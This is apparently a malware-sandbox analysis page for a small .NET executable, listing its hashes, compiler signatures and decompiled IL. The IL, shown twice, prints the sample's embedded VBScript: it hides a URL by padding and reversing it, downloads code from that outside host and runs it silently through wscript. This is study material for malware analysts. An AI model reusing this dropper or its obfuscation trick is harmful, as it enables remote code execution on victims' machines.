6337390646b9170dfa1665d3d5dbeab1

PE Executable
|
MD5: 6337390646b9170dfa1665d3d5dbeab1
|
Size: 5.63 KB
|
application/x-dosexec

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	6337390646b9170dfa1665d3d5dbeab1
Sha1	713eb28c001ce03d58e364582c3b0468a86604c2
Sha256	9bd13624a44f44d6ca82c9641ba950d8e329fd5132fad7681e37cc338afc2418
Sha384	633127d71d0a80bb9511f415ed21a1295a3b32bad0537eb7601d5c9c2363c00815421cee3c35f1c62fdfc2738eec8491
Sha512	dcb53c87b1eed54d46480d78e5871039caf93a3f6da5efdc972683cdc767dc0cff03d04cb83e5e2d8d75e18d105fd33f692e53930d242f7b46d1a25ca411c111
SSDeep	48:6HtRzWS3J3ybwxwY5IFGu7d0666lc2uDl+OEZEluj4j8feA6sFVuulxxxVKqXSfG:URjnQaEZElqU8fDxVxEzNt
TLSH	A2C12E02B3F84215F3B71B715BB397201B7ABA229C3DC78C1584050E7DEDA548962BB3

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual Studio .NET

File Structure

Informations

Name0	Value
Module Name	Program.exe
Full Name	Program.exe
EntryPoint	System.Void Program::Main()
Scope Name	Program.exe
Scope Type	ModuleDef
Kind	Console
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Program
Assembly Version	0.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	6
Main Method	System.Void Program::Main()
Main IL Instruction Count	35
Main IL	nop <null> call System.String System.IO.Path::GetTempPath() ldstr mi_script.vbs call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldstr Option Explicit Dim http, scriptCode Dim wow Dim objNetwork, userName, message ' Obtener el nombre del usuario actual Set objNetwork = CreateObject("WScript.Network") userName = objNetwork.UserName ' Crear un mensaje de bienvenida message = "PDF" & userName & "ERROR" wow = "##################################dN7tXI51/r/################################################ee.etsa############p//:sptt############################################################h" wow = Replace(wow, "#", "") wow = StrReverse(wow) Set http = CreateObject("MSXML2.XMLHTTP") http.Open "GET", wow, False http.Send If http.Status = 200 Then scriptCode = http.ResponseText ExecuteGlobal scriptCode End If stloc.1 <null> ldloc.0 <null> ldloc.1 <null> call System.Void System.IO.File::WriteAllText(System.String,System.String) nop <null> ldstr " ldloc.0 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) stloc.2 <null> ldstr wscript.exe ldloc.2 <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) nop <null> ldloc.3 <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) nop <null> ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldstr Script VBScript ejecutado. call System.Void System.Console::WriteLine(System.String) nop <null> ret <null>
Module Name	Program.exe
Full Name	Program.exe
EntryPoint	System.Void Program::Main()
Scope Name	Program.exe
Scope Type	ModuleDef
Kind	Console
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	Program
Assembly Version	0.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	6
Main Method	System.Void Program::Main()
Main IL Instruction Count	35
Main IL	nop <null> call System.String System.IO.Path::GetTempPath() ldstr mi_script.vbs call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldstr Option Explicit Dim http, scriptCode Dim wow Dim objNetwork, userName, message ' Obtener el nombre del usuario actual Set objNetwork = CreateObject("WScript.Network") userName = objNetwork.UserName ' Crear un mensaje de bienvenida message = "PDF" & userName & "ERROR" wow = "##################################dN7tXI51/r/################################################ee.etsa############p//:sptt############################################################h" wow = Replace(wow, "#", "") wow = StrReverse(wow) Set http = CreateObject("MSXML2.XMLHTTP") http.Open "GET", wow, False http.Send If http.Status = 200 Then scriptCode = http.ResponseText ExecuteGlobal scriptCode End If stloc.1 <null> ldloc.0 <null> ldloc.1 <null> call System.Void System.IO.File::WriteAllText(System.String,System.String) nop <null> ldstr " ldloc.0 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) stloc.2 <null> ldstr wscript.exe ldloc.2 <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) nop <null> ldloc.3 <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) nop <null> ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldstr Script VBScript ejecutado. call System.Void System.Console::WriteLine(System.String) nop <null> ret <null>

Artefacts

Name0	Value
Embedded Resources	0
Suspicious Type Names (1-2 chars)	0

6337390646b9170dfa1665d3d5dbeab1 (5.63 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
Embedded Resources	0	6337390646b9170dfa1665d3d5dbeab1
Suspicious Type Names (1-2 chars)	0	6337390646b9170dfa1665d3d5dbeab1

You must be signed in to post a comment.

6337390646b9170dfa1665d3d5dbeab1

PE Executable | MD5: 6337390646b9170dfa1665d3d5dbeab1 | Size: 5.63 KB | application/x-dosexec

PE Executable
|
MD5: 6337390646b9170dfa1665d3d5dbeab1
|
Size: 5.63 KB
|
application/x-dosexec